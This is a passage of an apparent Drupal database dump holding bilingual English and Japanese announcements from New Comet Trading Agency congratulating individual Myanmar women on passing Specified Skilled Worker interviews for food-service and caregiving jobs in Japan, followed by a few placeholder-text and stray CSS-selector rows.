('activities', 0, 185, 678, 'en', 0, '<p data-start=\"394\" data-end=\"428\"><strong data-start=\"394\" data-end=\"428\">Interview Success Announcement</strong></p><p data-start=\"430\" data-end=\"602\">New Comet Trading Agency is pleased to announce that Ms. Hnin Wa Than has successfully passed the interview for a Specified Skilled Worker (Food Service) position in Japan.</p><p data-start=\"604\" data-end=\"837\">This accomplishment represents an important step toward her professional development and future career in Japan. Through dedication and careful preparation, she has successfully progressed to the next stage of the employment process.</p><p data-start=\"839\" data-end=\"999\">The Food Service sector continues to provide valuable career opportunities for motivated individuals seeking international work experience and long-term growth.</p><p data-start=\"1001\" data-end=\"1131\">We sincerely congratulate Ms. Hnin Wa Than on her achievement and wish her every success as she prepares for her journey to Japan.</p>', '', 'full_html'),
('activities', 0, 185, 678, 'ja', 0, '<p data-start=\"394\" data-end=\"428\"><strong data-start=\"394\" data-end=\"428\">I</strong><strong data-start=\"1284\" data-end=\"1297\">面接合格のお知らせ</strong></p><p data-start=\"1299\" data-end=\"1373\">ニューコメット・トレーディング・エージェンシーは、HNIN WA THAN さんが特定技能（外食業）の採用面接に合格されたことをお知らせいたします。</p><p data-start=\"1375\" data-end=\"1442\">今回の合格は、日本でのキャリア形成に向けた大切な一歩となりました。ご本人の努力と準備が実を結び、次のステージへ進まれることとなります。</p><p data-start=\"1444\" data-end=\"1490\">外食業分野は、多くの経験と成長の機会を提供する魅力的な業界であり、今後の活躍が期待されます。</p><p data-start=\"1492\" data-end=\"1538\">心よりお祝い申し上げるとともに、日本での新たな挑戦が実り多いものとなることを願っております。</p>', '', 'full_html'),
('activities', 0, 186, 680, 'en', 0, '<p data-start=\"394\" data-end=\"428\"><strong data-start=\"394\" data-end=\"428\">Interview Success Announcement</strong></p><p data-start=\"430\" data-end=\"603\">New Comet Trading Agency is delighted to announce that Ms. Yadana Lwin has successfully passed the interview for a Specified Skilled Worker (Food Service) position in Japan.</p><p data-start=\"605\" data-end=\"746\">Her success reflects strong determination, careful preparation, and a clear commitment to pursuing a career in Japan\'s food service industry.</p><p data-start=\"748\" data-end=\"914\">Passing the interview demonstrates her readiness to take on new responsibilities and embrace the opportunities that await her in an international working environment.</p><p data-start=\"916\" data-end=\"1046\">We are pleased to celebrate this achievement and look forward to supporting her through the next stages of the employment process.</p><p data-start=\"1048\" data-end=\"1174\">Congratulations to Ms. Yadana Lwin on this outstanding accomplishment, and we wish her continued success in her future career.</p>', '', 'full_html'),
('activities', 0, 186, 680, 'ja', 0, '<p data-start=\"1326\" data-end=\"1339\"><strong data-start=\"1326\" data-end=\"1339\">面接合格のお知らせ</strong></p><p data-start=\"1341\" data-end=\"1414\">ニューコメット・トレーディング・エージェンシーは、YADANA LWIN さんが特定技能（外食業）の採用面接に合格されたことをお知らせいたします。</p><p data-start=\"1416\" data-end=\"1460\">今回の合格は、ご本人の強い意志と努力、そして日本で働くという目標に向けた準備の成果です。</p><p data-start=\"1462\" data-end=\"1502\">面接合格は新たなキャリアへの大切な第一歩であり、今後の活躍が大いに期待されます。</p><p data-start=\"1504\" data-end=\"1562\">ニューコメット・トレーディング・エージェンシーは、今後の手続きや日本での就労に向けて引き続きサポートしてまいります。</p><p data-start=\"1564\" data-end=\"1597\">心よりお祝い申し上げるとともに、さらなるご成功をお祈りいたします。</p>', '', 'full_html'),
('activities', 0, 187, 682, 'en', 0, '<p data-start=\"400\" data-end=\"434\"><strong data-start=\"400\" data-end=\"434\">Interview Success Announcement</strong></p><p data-start=\"436\" data-end=\"609\">New Comet Trading Agency is pleased to announce that Ms. Khit Yuya Soe has successfully passed the interview for a Specified Skilled Worker (Food Service) position in Japan.</p><p data-start=\"611\" data-end=\"831\">This achievement marks an important step toward building a successful career in Japan\'s food service industry. Through dedication and preparation, she has earned the opportunity to move forward in the employment process.</p><p data-start=\"833\" data-end=\"982\">Japan\'s food service sector offers valuable professional experience, skill development, and long-term career opportunities for motivated individuals.</p><p data-start=\"984\" data-end=\"1098\">We are proud of her accomplishment and look forward to seeing her continue her journey toward employment in Japan.</p><p data-start=\"1100\" data-end=\"1207\">We sincerely congratulate Ms. Khit Yuya Soe and wish her every success in the exciting opportunities ahead.</p>', '', 'full_html'),
('activities', 0, 187, 682, 'ja', 0, '<p data-start=\"1361\" data-end=\"1374\"><strong data-start=\"1361\" data-end=\"1374\">面接合格のお知らせ</strong></p><p data-start=\"1376\" data-end=\"1451\">ニューコメット・トレーディング・エージェンシーは、KHIT YUYA SOE さんが特定技能（外食業）の採用面接に合格されたことをお知らせいたします。</p><p data-start=\"1453\" data-end=\"1491\">今回の合格は、日本の外食業界でキャリアを築くための大切な第一歩となりました。</p><p data-start=\"1493\" data-end=\"1556\">これまでの努力と準備が実を結び、新たなチャンスへの扉が開かれました。外食業分野では、多くの経験や成長の機会が期待されています。</p><p data-start=\"1558\" data-end=\"1604\">今後の手続きが順調に進み、日本での新しい挑戦が実り多いものとなることを心より願っております。</p><p data-start=\"1606\" data-end=\"1623\">ご合格、誠におめでとうございます。</p>', '', 'full_html'),
('activities', 0, 188, 684, 'en', 0, '<p data-start=\"447\" data-end=\"481\"><strong data-start=\"447\" data-end=\"481\">Interview Success Announcement</strong></p><p data-start=\"483\" data-end=\"651\">New Comet Trading Agency is delighted to announce that Ms. May Phyoe Thu has successfully passed the interview for a Specified Skilled Worker (Kaigo) position in Japan.</p><p data-start=\"653\" data-end=\"892\">This achievement represents an important milestone in her journey toward a professional career in the caregiving sector. Through dedication, preparation, and a genuine desire to support others, she has successfully earned this opportunity.</p><p data-start=\"894\" data-end=\"1107\">The caregiving profession plays a vital role in supporting the well-being and quality of life of elderly individuals in Japan. We are confident that she will make a meaningful contribution in her future workplace.</p><p data-start=\"1109\" data-end=\"1269\">We sincerely congratulate Ms. May Phyoe Thu on her success and wish her continued achievement throughout the upcoming procedures and her future career in Japan.</p>', '', 'full_html'),
('activities', 0, 188, 684, 'ja', 0, '<p data-start=\"1421\" data-end=\"1434\"><strong data-start=\"1421\" data-end=\"1434\">面接合格のお知らせ</strong></p><p data-start=\"1436\" data-end=\"1510\">ニューコメット・トレーディング・エージェンシーは、MAY PHYOE THU さんが特定技能（介護）の採用面接に合格されたことをお知らせいたします。</p><p data-start=\"1512\" data-end=\"1561\">今回の合格は、介護分野で活躍するという目標に向けた大切な成果であり、ご本人の努力と熱意の表れです。</p><p data-start=\"1563\" data-end=\"1628\">介護の仕事は、高齢者の生活を支える大変重要でやりがいのある職業です。今後、日本の介護現場で活躍されることを大いに期待しております。</p><p data-start=\"1630\" data-end=\"1669\">心よりお祝い申し上げるとともに、日本での新たな挑戦とご活躍をお祈りいたします。</p>', '', 'full_html'),
('activities', 0, 189, 686, 'en', 0, '<p data-start=\"361\" data-end=\"395\"><strong data-start=\"361\" data-end=\"395\">Interview Success Announcement</strong></p><p data-start=\"397\" data-end=\"562\">New Comet Trading Agency is pleased to announce that Ms. Thet Mon Soe has successfully passed the interview for a Specified Skilled Worker (Kaigo) position in Japan.</p><p data-start=\"564\" data-end=\"711\">This accomplishment reflects her commitment to professional development and her dedication to pursuing a meaningful career in the caregiving field.</p><p data-start=\"713\" data-end=\"933\">The Kaigo sector requires compassion, responsibility, and a strong willingness to support others. Through her preparation and determination, she has successfully demonstrated these qualities during the interview process.</p><p data-start=\"935\" data-end=\"1097\">We extend our heartfelt congratulations to Ms. Thet Mon Soe and wish her continued success as she moves forward toward employment and a rewarding career in Japan.</p>', '', 'full_html'),
('activities', 0, 189, 686, 'ja', 0, '<p data-start=\"1248\" data-end=\"1261\"><strong data-start=\"1248\" data-end=\"1261\">面接合格のお知らせ</strong></p><p data-start=\"1263\" data-end=\"1336\">ニューコメット・トレーディング・エージェンシーは、THET MON SOE さんが特定技能（介護）の採用面接に合格されたことをお知らせいたします。</p><p data-start=\"1338\" data-end=\"1375\">今回の合格は、介護分野で活躍したいという強い意志と、日々の努力の成果です。</p><p data-start=\"1377\" data-end=\"1457\">介護の仕事には、思いやりや責任感、そして人を支えたいという気持ちが求められます。面接を通じて、そのような資質を十分に発揮されたことが今回の結果につながりました。</p><p data-start=\"1459\" data-end=\"1507\">心よりお祝い申し上げるとともに、日本での新たなキャリアが充実したものとなることを願っております。</p>', '', 'full_html'),
('activities', 0, 190, 689, 'en', 0, '<p><strong>Interview Success Announcement</strong></p><p>New Comet Trading Agency is proud to announce that Ms. Wai Mon Thant has successfully passed the interview for a Specified Skilled Worker (Food Service) position in Japan.</p><p>Achieving a successful interview result requires not only knowledge and skills but also confidence, preparation, and determination. Through her dedication and commitment, she has earned the opportunity to take the next step toward working in Japan.</p><p>This accomplishment represents the beginning of an exciting professional journey within Japan\'s food service industry, where valuable experience and future growth opportunities await.</p><p>We sincerely congratulate Ms. Wai Mon Thant on this achievement and wish her every success in the upcoming procedures and her future career in Japan.</p>', '', 'full_html'),
('activities', 0, 190, 689, 'ja', 0, '<p><strong>I</strong><strong data-start=\"1328\" data-end=\"1341\">面接合格のお知らせ</strong></p><p data-start=\"1343\" data-end=\"1418\">ニューコメット・トレーディング・エージェンシーは、WAI MON THANT さんが特定技能（外食業）の採用面接に合格されたことをお知らせいたします。</p><p data-start=\"1420\" data-end=\"1464\">面接合格は、知識や技術だけでなく、努力と準備の積み重ねによって達成される大切な成果です。</p><p data-start=\"1466\" data-end=\"1509\">今回の合格により、日本の外食業界で働くという目標に向けて大きな一歩を踏み出されました。</p><p data-start=\"1511\" data-end=\"1558\">今後の手続きが順調に進み、日本で多くの経験を積みながらご活躍されることを心より願っております。</p><p data-start=\"1560\" data-end=\"1577\">ご合格、誠におめでとうございます。</p>', '', 'full_html'),
('activities', 0, 191, 691, 'en', 0, '<p data-start=\"392\" data-end=\"426\"><strong data-start=\"392\" data-end=\"426\">Interview Success Announcement</strong></p><p data-start=\"428\" data-end=\"617\">New Comet Trading Agency is pleased to share the successful interview result of Ms. Ei Ei Khet, who has passed the interview for a Specified Skilled Worker (Food Service) position in Japan.</p><p data-start=\"619\" data-end=\"837\">Behind every successful interview is a period of learning, preparation, and personal effort. Through her dedication and positive attitude, she has achieved an important milestone on her journey toward working in Japan.</p><p data-start=\"839\" data-end=\"952\">This success reflects her commitment to personal growth and her determination to pursue new opportunities abroad.</p><p data-start=\"954\" data-end=\"1119\">We warmly congratulate Ms. Ei Ei Khet on this achievement and wish her continued success as she proceeds to the next stage of her journey toward employment in Japan.</p>', '', 'full_html'),
('activities', 0, 191, 691, 'ja', 0, '<p data-start=\"1270\" data-end=\"1283\"><strong data-start=\"1270\" data-end=\"1283\">面接合格のお知らせ</strong></p><p data-start=\"1285\" data-end=\"1357\">ニューコメット・トレーディング・エージェンシーは、EI EI KHET さんが特定技能（外食業）の採用面接に合格されたことをお知らせいたします。</p><p data-start=\"1359\" data-end=\"1416\">面接合格の裏には、日々の学習や準備、そしてご本人の努力があります。今回の成果は、その積み重ねが実を結んだ結果です。</p><p data-start=\"1418\" data-end=\"1464\">この合格は、日本で働くという目標に向けた大切な節目であり、新たな可能性への第一歩となります。</p><p data-start=\"1466\" data-end=\"1506\">心よりお祝い申し上げるとともに、今後の手続きと日本でのご活躍をお祈りいたします。</p>', '', 'full_html'),
('activities', 0, 192, 693, 'en', 0, '<p data-start=\"327\" data-end=\"361\"><strong data-start=\"327\" data-end=\"361\">Interview Success Announcement</strong></p><p data-start=\"363\" data-end=\"532\">New Comet Trading Agency is delighted to announce that Ms. Sabi Oo has successfully passed the interview for a Specified Skilled Worker (Food Service) position in Japan.</p><p data-start=\"534\" data-end=\"792\">This achievement is the result of her persistence, dedication, and continuous efforts to pursue employment opportunities in Japan. Through careful preparation and determination, she has successfully reached an important milestone in her professional journey.</p><p data-start=\"794\" data-end=\"922\">Passing the interview opens the door to valuable experiences and future career development within Japan\'s food service industry.</p><p data-start=\"924\" data-end=\"1072\">We sincerely congratulate Ms. Sabi Oo on this accomplishment and wish her success throughout the upcoming procedures and her future career in Japan.</p>', '', 'full_html'),
('activities', 0, 192, 693, 'ja', 0, '<p data-start=\"1220\" data-end=\"1233\"><strong data-start=\"1220\" data-end=\"1233\">面接合格のお知らせ</strong></p><p data-start=\"1235\" data-end=\"1304\">ニューコメット・トレーディング・エージェンシーは、SABI OO さんが特定技能（外食業）の採用面接に合格されたことをお知らせいたします。</p><p data-start=\"1306\" data-end=\"1358\">今回の合格は、ご本人の粘り強い努力と継続的な学習、そして日本で働くという目標に向けた強い意志の成果です。</p><p data-start=\"1360\" data-end=\"1415\">面接合格は、日本の外食業界で活躍するための大切な第一歩であり、今後さらなる成長と経験につながる機会となります。</p><p data-start=\"1417\" data-end=\"1456\">心よりお祝い申し上げるとともに、日本でのご活躍と明るい未来をお祈りいたします。</p>', '', 'full_html'),
('activities', 0, 193, 696, 'en', 0, '<p><strong>Interview Success Announcement</strong></p><p>New Comet Trading Agency is pleased to announce that Ms. Thwel Thwel Aye has successfully passed the interview for a Specified Skilled Worker (Food Service) position in Japan.</p><p>Her achievement reflects the confidence, preparation, and determination she demonstrated throughout the recruitment process. Successfully completing the interview is an important step toward achieving her professional goals in Japan.</p><p>This opportunity will allow her to gain valuable experience, develop new skills, and build a successful future within Japan\'s food service industry.</p><p>We extend our sincere congratulations to Ms. Thwel Thwel Aye and wish her continued success as she prepares for the next stage of her journey.</p>', '', 'full_html'),
('activities', 0, 193, 696, 'ja', 0, '<p data-start=\"1277\" data-end=\"1290\"><strong data-start=\"1277\" data-end=\"1290\">面接合格のお知らせ</strong></p><p data-start=\"1292\" data-end=\"1369\">ニューコメット・トレーディング・エージェンシーは、THWEL THWEL AYE さんが特定技能（外食業）の採用面接に合格されたことをお知らせいたします。</p><p data-start=\"1371\" data-end=\"1426\">今回の合格は、ご本人の自信、努力、そして準備の成果であり、日本でのキャリア実現に向けた大切な一歩となりました。</p><p data-start=\"1428\" data-end=\"1476\">外食業界での経験を通じて、多くの知識や技術を身につけ、さらなる成長につながることが期待されます。</p><p data-start=\"1478\" data-end=\"1518\">心よりお祝い申し上げるとともに、今後の手続きと日本でのご活躍をお祈りいたします。</p>', '', 'full_html'),
('activities', 0, 194, 698, 'en', 0, '<p data-start=\"366\" data-end=\"400\"><strong data-start=\"366\" data-end=\"400\">Interview Success Announcement</strong></p><p data-start=\"402\" data-end=\"575\">New Comet Trading Agency is delighted to announce that Ms. Moe Moe Zaw has successfully passed the interview for a Specified Skilled Worker (Food Service) position in Japan.</p><p data-start=\"577\" data-end=\"751\">This achievement marks an exciting opportunity for her to gain international work experience and further develop her professional skills within Japan\'s food service industry.</p><p data-start=\"753\" data-end=\"916\">Through dedication, preparation, and a positive attitude, she successfully completed the interview process and moved one step closer to achieving her career goals.</p><p data-start=\"918\" data-end=\"1075\">We congratulate Ms. Moe Moe Zaw on this accomplishment and wish her continued success throughout the remaining procedures and her future employment in Japan.</p><p data-start=\"1077\" data-end=\"1160\">We look forward to seeing her grow and thrive in her upcoming professional journey.</p>', '', 'full_html'),
('activities', 0, 194, 698, 'ja', 0, '<p data-start=\"1312\" data-end=\"1325\"><strong data-start=\"1312\" data-end=\"1325\">面接合格のお知らせ</strong></p><p data-start=\"1327\" data-end=\"1400\">ニューコメット・トレーディング・エージェンシーは、MOE MOE ZAW さんが特定技能（外食業）の採用面接に合格されたことをお知らせいたします。</p><p data-start=\"1402\" data-end=\"1449\">今回の合格により、日本の外食業界で国際的な職業経験を積むための大きなチャンスを手にされました。</p><p data-start=\"1451\" data-end=\"1493\">ご本人の努力と前向きな姿勢、そして十分な準備が今回の素晴らしい結果につながりました。</p><p data-start=\"1495\" data-end=\"1541\">今後の手続きが順調に進み、日本で多くの経験と成長の機会を得られることを心より願っております。</p><p data-start=\"1543\" data-end=\"1560\">ご合格、誠におめでとうございます。</p>', '', 'full_html'),
('activities', 0, 195, 700, 'en', 0, '<p data-start=\"388\" data-end=\"422\"><strong data-start=\"388\" data-end=\"422\">Interview Success Announcement</strong></p><p data-start=\"424\" data-end=\"595\">New Comet Trading Agency is pleased to announce that Ms. Ei Ei Phyoe has successfully passed the interview for a Specified Skilled Worker (Food Service) position in Japan.</p><p data-start=\"597\" data-end=\"728\">This achievement reflects her commitment to learning, self-improvement, and preparation for international employment opportunities.</p><p data-start=\"730\" data-end=\"923\">As she moves forward in the recruitment process, she will have the opportunity to apply her knowledge and skills within Japan\'s food service industry while continuing to develop professionally.</p><p data-start=\"925\" data-end=\"1027\">We are proud of her accomplishment and extend our sincere congratulations on this important milestone.</p><p data-start=\"1029\" data-end=\"1153\">We wish Ms. Ei Ei Phyoe every success in the next stage of her journey and look forward to her future achievements in Japan.</p>', '', 'full_html'),
('activities', 0, 195, 700, 'ja', 0, '<p data-start=\"1305\" data-end=\"1318\"><strong data-start=\"1305\" data-end=\"1318\">面接合格のお知らせ</strong></p><p data-start=\"1320\" data-end=\"1393\">ニューコメット・トレーディング・エージェンシーは、EI EI PHYOE さんが特定技能（外食業）の採用面接に合格されたことをお知らせいたします。</p><p data-start=\"1395\" data-end=\"1431\">今回の合格は、ご本人の学習意欲と努力、そして将来に向けた準備の成果です。</p><p data-start=\"1433\" data-end=\"1478\">今後、日本の外食業界で知識や技術を活かしながら、さらに成長し活躍されることが期待されます。</p><p data-start=\"1480\" data-end=\"1528\">この素晴らしい成果を心よりお祝いするとともに、今後の手続きと日本でのご活躍をお祈り申し上げます。</p><p data-start=\"1535\" data-end=\"1584\">&nbsp;</p>', '', 'full_html'),
('activities', 0, 196, 702, 'en', 0, '<p data-start=\"348\" data-end=\"382\"><strong data-start=\"348\" data-end=\"382\">Interview Success Announcement</strong></p><p data-start=\"384\" data-end=\"553\">New Comet Trading Agency is proud to announce that Ms. Win Win Thu has successfully passed the interview for a Specified Skilled Worker (Food Service) position in Japan.</p><p data-start=\"555\" data-end=\"686\">This achievement is the result of determination, perseverance, and continuous effort toward achieving her goal of working in Japan.</p><p data-start=\"688\" data-end=\"948\">Each successful interview represents an important step toward a brighter future and greater professional opportunities. Through her preparation and dedication, she has successfully moved one step closer to beginning her career in Japan\'s food service industry.</p><p data-start=\"950\" data-end=\"1114\">We sincerely congratulate Ms. Win Win Thu on this accomplishment and wish her continued success throughout the remaining procedures and her future journey in Japan.</p>', '', 'full_html'),
('activities', 0, 196, 702, 'ja', 0, '<p data-start=\"1266\" data-end=\"1279\"><strong data-start=\"1266\" data-end=\"1279\">面接合格のお知らせ</strong></p><p data-start=\"1281\" data-end=\"1354\">ニューコメット・トレーディング・エージェンシーは、WIN WIN THU さんが特定技能（外食業）の採用面接に合格されたことをお知らせいたします。</p><p data-start=\"1356\" data-end=\"1409\">今回の合格は、ご本人の努力と粘り強い挑戦の成果であり、日本で働くという目標に向けた大きな前進となりました。</p><p data-start=\"1411\" data-end=\"1456\">面接合格は、将来の可能性を広げる重要な一歩であり、新たなキャリアへのスタートでもあります。</p><p data-start=\"1458\" data-end=\"1498\">心よりお祝い申し上げるとともに、日本でのご活躍とさらなる成功をお祈りいたします。</p>', '', 'full_html'),
('activities', 0, 197, 704, 'en', 0, '<p data-start=\"320\" data-end=\"354\"><strong data-start=\"320\" data-end=\"354\">Interview Success Announcement</strong></p><p data-start=\"356\" data-end=\"531\">New Comet Trading Agency is pleased to announce that Ms. Tun Eaindar Moe has successfully passed the interview for a Specified Skilled Worker (Food Service) position in Japan.</p><p data-start=\"533\" data-end=\"700\">This achievement represents more than a successful interview—it is the beginning of new possibilities and future opportunities in an international working environment.</p><p data-start=\"702\" data-end=\"868\">Through dedication, preparation, and a positive mindset, she has successfully earned the opportunity to move forward toward employment in Japan\'s food service sector.</p><p data-start=\"870\" data-end=\"1008\">We are delighted to celebrate this important milestone and look forward to seeing her continue to grow both personally and professionally.</p><p data-start=\"1010\" data-end=\"1113\">Congratulations to Ms. Tun Eaindar Moe, and we wish her every success in the next stage of her journey.</p>', '', 'full_html'),
('activities', 0, 197, 704, 'ja', 0, '<p data-start=\"1269\" data-end=\"1282\"><strong data-start=\"1269\" data-end=\"1282\">面接合格のお知らせ</strong></p><p data-start=\"1284\" data-end=\"1361\">ニューコメット・トレーディング・エージェンシーは、TUN EAINDAR MOE さんが特定技能（外食業）の採用面接に合格されたことをお知らせいたします。</p><p data-start=\"1363\" data-end=\"1413\">今回の合格は、単なる面接成功にとどまらず、日本での新たな可能性と将来への第一歩となる大切な成果です。</p><p data-start=\"1415\" data-end=\"1457\">ご本人の努力と前向きな姿勢、そして十分な準備が今回の素晴らしい結果につながりました。</p><p data-start=\"1459\" data-end=\"1496\">今後、日本で多くの経験を積みながら成長されることを心より期待しております。</p><p data-start=\"1498\" data-end=\"1515\">ご合格、誠におめでとうございます。</p>', '', 'full_html'),
('activities', 0, 198, 706, 'en', 0, '<p data-start=\"337\" data-end=\"371\"><strong data-start=\"337\" data-end=\"371\">Interview Success Announcement</strong></p><p data-start=\"373\" data-end=\"550\">New Comet Trading Agency is pleased to announce that Ms. Mai Thandar Naing has successfully passed the interview for a Specified Skilled Worker (Food Service) position in Japan.</p><p data-start=\"552\" data-end=\"786\">This achievement reflects her dedication, hard work, and commitment to pursuing new career opportunities abroad. Passing the interview is an important accomplishment that brings her one step closer to achieving her professional goals.</p><p data-start=\"788\" data-end=\"964\">The Food Service sector in Japan provides valuable opportunities to gain practical experience, develop workplace skills, and build a strong foundation for future career growth.</p><p data-start=\"966\" data-end=\"1162\">We are proud of her success and extend our heartfelt congratulations on this important milestone. We wish her continued success in the next stages of the process and in her future career in Japan.</p>', '', 'full_html'),
('activities', 0, 198, 706, 'ja', 0, '<p data-start=\"1320\" data-end=\"1333\"><strong data-start=\"1320\" data-end=\"1333\">面接合格のお知らせ</strong></p><p data-start=\"1335\" data-end=\"1414\">ニューコメット・トレーディング・エージェンシーは、MAI THANDAR NAING さんが特定技能（外食業）の採用面接に合格されたことをお知らせいたします。</p><p data-start=\"1416\" data-end=\"1465\">今回の合格は、ご本人の努力と熱意の成果であり、日本でのキャリア実現に向けた大切な前進となりました。</p><p data-start=\"1467\" data-end=\"1510\">日本の外食業界では、多くの実務経験やスキル向上の機会があり、今後の成長が期待されます。</p><p data-start=\"1512\" data-end=\"1562\">この素晴らしい成果を心よりお祝い申し上げるとともに、今後の手続きと日本でのご活躍をお祈りいたします。</p>', '', 'full_html'),
('activities', 0, 199, 708, 'en', 0, '<p data-start=\"310\" data-end=\"344\"><strong data-start=\"310\" data-end=\"344\">Interview Success Announcement</strong></p><p data-start=\"346\" data-end=\"519\">New Comet Trading Agency is delighted to announce that Ms. Ei Zin Htwe has successfully passed the interview for a Specified Skilled Worker (Food Service) position in Japan.</p><p data-start=\"521\" data-end=\"737\">Every achievement begins with dedication and consistent effort. Through her commitment to learning and careful preparation, she has successfully achieved an important milestone on her path toward employment in Japan.</p><p data-start=\"739\" data-end=\"908\">This accomplishment not only reflects her hard work but also demonstrates her readiness to take on new challenges and opportunities within Japan\'s food service industry.</p><p data-start=\"910\" data-end=\"1040\">We warmly congratulate Ms. Ei Zin Htwe on her success and wish her the very best as she proceeds to the next stage of her journey.</p>', '', 'full_html'),
('activities', 0, 199, 708, 'ja', 0, '<p data-start=\"1192\" data-end=\"1205\"><strong data-start=\"1192\" data-end=\"1205\">面接合格のお知らせ</strong></p><p data-start=\"1207\" data-end=\"1280\">ニューコメット・トレーディング・エージェンシーは、EI ZIN HTWE さんが特定技能（外食業）の採用面接に合格されたことをお知らせいたします。</p><p data-start=\"1282\" data-end=\"1334\">今回の合格は、日々の努力と継続的な学習の成果であり、日本で働くという目標に向けた大きな前進となりました。</p><p data-start=\"1336\" data-end=\"1390\">この成果は、ご本人の熱意と準備の積み重ねによって実現したものであり、今後のさらなる成長と活躍が期待されます。</p><p data-start=\"1392\" data-end=\"1439\">心よりお祝い申し上げるとともに、日本での新しい挑戦が素晴らしいものとなることを願っております。</p>', '', 'full_html'),
('activities', 0, 200, 710, 'en', 0, '<p data-start=\"330\" data-end=\"364\"><strong data-start=\"330\" data-end=\"364\">Interview Success Announcement</strong></p><p data-start=\"366\" data-end=\"542\">New Comet Trading Agency is pleased to announce that Ms. Htay Htay Khaing has successfully passed the interview for a Specified Skilled Worker (Food Service) position in Japan.</p><p data-start=\"544\" data-end=\"699\">This achievement reflects her willingness to learn, determination to succeed, and readiness to take on new challenges in an international work environment.</p><p data-start=\"701\" data-end=\"919\">Passing the interview is an important step toward joining Japan\'s food service industry, where she will have opportunities to gain practical experience, strengthen her professional skills, and build a rewarding career.</p><p data-start=\"921\" data-end=\"1066\">We congratulate Ms. Htay Htay Khaing on this accomplishment and wish her continued success as she moves forward to the next stage of her journey.</p>', '', 'full_html'),
('activities', 0, 200, 710, 'ja', 0, '<p data-start=\"1223\" data-end=\"1236\"><strong data-start=\"1223\" data-end=\"1236\">面接合格のお知らせ</strong></p><p data-start=\"1238\" data-end=\"1316\">ニューコメット・トレーディング・エージェンシーは、HTAY HTAY KHAING さんが特定技能（外食業）の採用面接に合格されたことをお知らせいたします。</p><p data-start=\"1318\" data-end=\"1373\">今回の合格は、新しいことに挑戦する意欲と努力の成果であり、日本でのキャリア実現に向けた大切な一歩となりました。</p><p data-start=\"1375\" data-end=\"1425\">外食業界での経験を通じて、多くの知識や技術を身につけ、さらなる成長につながることを期待しております。</p><p data-start=\"1427\" data-end=\"1467\">心よりお祝い申し上げるとともに、今後の手続きと日本でのご活躍をお祈りいたします。</p>', '', 'full_html');
INSERT INTO `node__body` (`bundle`, `deleted`, `entity_id`, `revision_id`, `langcode`, `delta`, `body_value`, `body_summary`, `body_format`) VALUES
('language_center', 0, 204, 720, 'en', 0, '<p><span style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);color:rgb(0, 0, 0);display:inline !important;float:none;font-family:&quot;Open Sans&quot;, Arial, sans-serif;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;orphans:2;text-align:justify;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;word-spacing:0px;\">he librarian at St Bride Printing Library in London, took a 1914 Cicero translation and scrambled it to make dummy text for Letraset\'s Body Type sheets. It has survived not only many decades, but also the leap into ele</span></p><p><span style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);color:rgb(0, 0, 0);display:inline !important;float:none;font-family:&quot;Open Sans&quot;, Arial, sans-serif;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;orphans:2;text-align:justify;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;word-spacing:0px;\">he librarian at St Bride Printing Library in London, took a 1914 Cicero translation and scrambled it to make dummy text for Letraset\'s Body Type sheets. It has survived not only many decades, but also the leap into ele</span></p><p><span style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);color:rgb(0, 0, 0);display:inline !important;float:none;font-family:&quot;Open Sans&quot;, Arial, sans-serif;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;orphans:2;text-align:justify;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;word-spacing:0px;\">he librarian at St Bride Printing Library in London, took a 1914 Cicero translation and scrambled it to make dummy text for Letraset\'s Body Type sheets. It has survived not only many decades, but also the leap into ele</span></p>', '', 'full_html'),
('language_center', 0, 204, 720, 'ja', 0, '<p><span style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);color:rgb(0, 0, 0);display:inline !important;float:none;font-family:&quot;Open Sans&quot;, Arial, sans-serif;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;orphans:2;text-align:justify;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;word-spacing:0px;\">he librarian at St Bride Printing Library in London, took a 1914 Cicero translation and scrambled it to make dummy text for Letraset\'s Body Type sheets. It has survived not only many decades, but also the leap into ele</span></p><p><span style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);color:rgb(0, 0, 0);display:inline !important;float:none;font-family:&quot;Open Sans&quot;, Arial, sans-serif;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;orphans:2;text-align:justify;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;word-spacing:0px;\">he librarian at St Bride Printing Library in London, took a 1914 Cicero translation and scrambled it to make dummy text for Letraset\'s Body Type sheets. It has survived not only many decades, but also the leap into ele</span></p><p><span style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);color:rgb(0, 0, 0);display:inline !important;float:none;font-family:&quot;Open Sans&quot;, Arial, sans-serif;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;orphans:2;text-align:justify;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;word-spacing:0px;\">he librarian at St Bride Printing Library in London, took a 1914 Cicero translation and scrambled it to make dummy text for Letraset\'s Body Type sheets. It has survived not only many decades, but also the leap into ele</span></p>', '', 'full_html'),
('language_center', 0, 205, 721, 'en', 0, '<p>.path-language-center .view-language-center .views-field-view-node span.field-content a .path-language-center .view-language-center .views-field-view-node span.field-content a .path-language-center .view-language-center .views-field-view-node span.field-content a .path-language-center .view-language-center .views-field-view-node span.field-content a&nbsp;</p>', '', 'basic_html'),
